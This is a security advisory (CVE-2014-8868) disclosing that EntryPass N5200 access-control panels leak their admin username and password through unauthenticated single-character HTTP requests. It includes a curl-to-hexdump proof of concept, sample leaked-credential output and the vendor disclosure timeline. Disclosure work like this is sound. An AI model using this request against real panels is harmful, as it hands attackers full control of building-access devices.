EntryPass N5200 Credential Disclosure

`Advisory: EntryPass N5200 Credentials Disclosure  
  
EntryPass N5200 Active Network Control Panels allow the unauthenticated  
downloading of information that includes the current administrative  
username and password.  
  
  
Details  
=======  
  
Product: EntryPass N5200 Active Network Control Panel  
Affected Versions: unknown  
Fixed Versions: not available  
Vulnerability Type: Information Disclosure, Credentials Disclosure  
Security Risk: high  
Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200  
Vendor Status: notified  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011  
Advisory Status: published  
CVE: CVE-2014-8868  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868  
  
  
Introduction  
============  
  
"EntryPass Active Networks are designed to enhance highly customized and  
rapid 'real-time' changes to the underlying network operation.  
Brilliantly engineered with all the power you need to enable  
code-sending, minus unnecessary buffer time with its distributed  
architecture capable of processing access demand at the edge level  
without leveraging at the server end."  
  
(From the vendor's home page)  
  
  
More Details  
============  
  
EntryPass N5200 Active Network Control Panels offer an HTTP service on  
TCP port 80. It appears that only the first character of a requested  
URL's path is relevant to the web server. For example, requesting the  
URL  
  
http://example.com/1styles.css  
  
yields the same CSS file as requesting the following URL:  
  
http://example.com/1redteam  
  
By enumerating all one-character long URLs on a device, it was  
determined that URLs starting with a numeric character are used by the  
web interface, as listed in the following table:  
  
http://example.com/0 Index  
http://example.com/1 Stylesheet  
http://example.com/2 Authentication with Username/Password  
http://example.com/3 Session Management  
http://example.com/4 Device Status  
http://example.com/5 Progressbar Image  
http://example.com/6 Reset Status  
http://example.com/7 Login Form  
http://example.com/8 HTTP 404 Error Page  
http://example.com/9 JavaScript  
  
For URLs starting with non-numeric characters, an HTTP 404 - Not Found  
error page is normally returned. Exceptions to this rule are URLs  
starting with the lower case letters o to z and the upper case letters A  
to D. When requesting these URLs, memory contents from the device appear  
to be returned in the server's HTTP response.  
  
As highlighted in the following listing, both the currently set username  
ADMIN and the corresponding password 123456 are disclosed in the memory  
contents when requesting the URL http://example.com/o:  
  
$ curl -s http://example.com/o | hexdump -C | head  
[...]  
0010 XX XX XX XX XX XX XX XX XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|  
0020 6e 74 72 79 70 61 73 73 2e 6e 65 74 00 00 00 00 |ntrypass.net....|  
[...]  
0060 XX XX XX XX XX XX XX XX XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|  
0070 20 20 31 32 33 34 35 36 26 20 XX XX XX XX XX XX | 123456& XXXXXX|  
[...]  
  
These credentials grant access to the administrative web interface of  
the device when using them in the regular login form.  
  
Similarly, it is possible to get the status output of the device without  
prior authentication by simply requesting the following URL  
  
http://example.com/4  
  
The server responds to the request with the following XML data, which  
contains information about various different settings of the device.  
  
<html>  
<head>  
<title>Device Server Manager</title>  
</head>  
<body>  
<serial_no>XXXXXXXXXXXX-XXXX</serial_no>  
<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>  
<mac_address>XX-XX-XX-XX-XX-XX</mac_address>  
<disable_reporting>disabled</disable_reporting>  
<commit_setting>checked</commit_setting>  
<user_id>ADMIN</user_id>  
<user_pass>******</user_pass>  
[...]  
</body>  
</html>  
  
  
Proof of Concept  
================  
  
------------------------------------------------------------------------  
$ curl -s http://example.com/o | hexdump -C | head  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
Access to the web interface should be blocked at the network layer.  
  
  
Fix  
===  
  
Not available.  
  
  
Security Risk  
=============  
  
Attackers with network access to an EntryPass N5200 Active Network  
Control Panel can retrieve memory contents from the device. These memory  
contents disclose the currently set username and password needed to  
access the administrative interface of the device. Using these  
credentials, it is possible to read the device's current status and  
configuration, as well as modify settings and install firmware updates.  
  
With regards to the device itself, this vulnerability poses a high risk,  
as it allows attackers to gain full control. The actual operational risk  
depends on how the device is used in practice.  
  
  
Timeline  
========  
  
2014-05-19 Vulnerability identified  
2014-08-25 Customer approved disclosure to vendor  
2014-08-27 Vendor contacted, security contact requested  
2014-09-03 Vendor contacted, security contact requested  
2014-09-15 Vendor contacted, vulnerability reported  
2014-09-17 Update requested from vendor, no response  
2014-10-15 No response from vendor. Customer discontinued use of the  
product and approved public disclosure  
2014-10-20 Contacted vendor again since no fix or roadmap was provided.  
2014-10-28 CVE number requested  
2014-11-14 CVE number assigned  
2014-12-01 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
https://www.redteam-pentesting.de.  
  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`